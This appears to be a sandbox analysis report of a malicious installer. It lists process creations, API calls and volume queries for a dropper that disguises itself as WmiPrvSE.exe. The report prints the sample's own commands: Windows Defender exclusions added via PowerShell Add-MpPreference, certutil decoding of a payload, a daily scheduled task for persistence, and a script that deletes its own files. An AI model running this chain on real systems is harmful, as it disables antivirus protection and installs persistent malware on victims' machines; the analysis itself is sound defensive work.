Code function: 4_2_000CA3DA GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

4_2_000CA3DA

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe"

Jump to behavior

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000CC509 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_000CC509
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0006CAC0 __set_se_translator,SetUnhandledExceptionFilter,	4_2_0006CAC0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000CD34D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_000CD34D
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000CD4E0 SetUnhandledExceptionFilter,	4_2_000CD4E0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000D1673 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_000D1673
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB262510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF7BB262510
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB263354 SetUnhandledExceptionFilter,	5_2_00007FF7BB263354
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB263170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF7BB263170
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB2676D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF7BB2676D8
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,	23_2_00401180
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	23_2_00401A70
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_004542E4 SetUnhandledExceptionFilter,	23_2_004542E4
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00402F62 SetUnhandledExceptionFilter,	23_2_00402F62
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_007924F0 SetUnhandledExceptionFilter,	23_2_007924F0
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_007924D8 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,	23_2_007924D8
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_007844D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_007844D0

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"			Jump to behavior

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 23_2_0077DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

23_2_0077DF50

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000A9360 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow,

4_2_000A9360

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\WmiPrvSE.exe C:\Users\Public\WmiPrvSE.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -noninteractive -nologo -executionpolicy remotesigned -command "c:\windows\systemtemp\ai_4a51.ps1 -paths 'c:\users\user\appdata\roaming\wmiprvse\wmiprvse\prerequisites\file_deleter.ps1','c:\users\user\appdata\roaming\wmiprvse\wmiprvse\prerequisites\aipackagechainer.exe','c:\users\user\appdata\roaming\wmiprvse\wmiprvse','c:\users\user\appdata\roaming\wmiprvse' -retry_count 10"
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -noninteractive -nologo -executionpolicy remotesigned -command "c:\windows\systemtemp\ai_4a51.ps1 -paths 'c:\users\user\appdata\roaming\wmiprvse\wmiprvse\prerequisites\file_deleter.ps1','c:\users\user\appdata\roaming\wmiprvse\wmiprvse\prerequisites\aipackagechainer.exe','c:\users\user\appdata\roaming\wmiprvse\wmiprvse','c:\users\user\appdata\roaming\wmiprvse' -retry_count 10"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000827B0 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,

4_2_000827B0

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000CCFE0 cpuid

4_2_000CCFE0

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	4_2_000E68CB
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,	4_2_000E6AC6
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: EnumSystemLocalesW,	4_2_000E6B6D
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: EnumSystemLocalesW,	4_2_000E6BB8
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: EnumSystemLocalesW,	4_2_000E6C53
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_000E6CDE
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,	4_2_000AED70
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,	4_2_000E6F31
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_000E705A
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,	4_2_000E7160
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_000E722F
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: EnumSystemLocalesW,	4_2_000DD78E
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,	4_2_000DDCD5
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	5_2_00007FF7BB25A2CC

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
